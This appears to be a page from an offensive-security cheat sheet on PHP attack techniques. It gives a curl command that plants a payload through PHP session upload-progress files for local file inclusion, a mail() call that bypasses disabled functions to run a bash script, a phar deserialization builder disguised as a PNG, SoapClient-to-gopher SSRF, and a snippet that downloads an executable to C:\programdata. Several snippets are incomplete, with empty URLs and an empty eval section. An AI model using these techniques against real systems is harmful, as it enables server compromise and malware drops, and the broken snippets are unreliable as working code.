Dangerous Functions

PHP Temporary Files

PHP will create temporary files for files send with POST and for sessions. If we have a LFI we can get our php code onto the box and then include these.

PHP_SESSION_UPLOAD_PROGRESS (will create sess_xct in /tmp):

curl --path-as-is '' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F 'data=@dummy.txt' -H 'Cookie: PHPSESSID=xct';

Disable Functions Bypass


  mail("a","b","c","d","-H 'bash /tmp/exploit'");

PHP7 Backtrace

Interesting Behavior

PHP's REQUEST takes values from GET, POST and also COOKIE. This can lead to some interesting behavior by setting GET/POST and COOKIE parameters to different values. Values from COOKIE are disabled by default though.


If we have a file_exists or similar method on uploaded content, we can request via phar:// wrapper. This allows to use deserialization gadgets.

function generate_base_phar($o, $prefix){
    global $tempname;
    $phar = new Phar($tempname);
    $phar->addFromString("test.txt", "$prefix xct_was_here");
    $phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
    $basecontent = file_get_contents($tempname);
    return $basecontent;

$object = new <Your Class>;

# prefix for faking a valid png
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
$tempname = 'temp.phar'; // make it phar
$outfile = 'out.png';
file_put_contents($outfile, generate_base_phar($object, $prefix));

If no good gadgets are available SoapClient can be used to SSRF via gopher to other local services like MySQL.

Eval Code Injection

Simple but effective:


Upload & Execute File

    $data = file_get_contents("");
    file_put_contents( "C:\\programdata\\xc_10.10.14.51_8080.exe", $data);

Last updated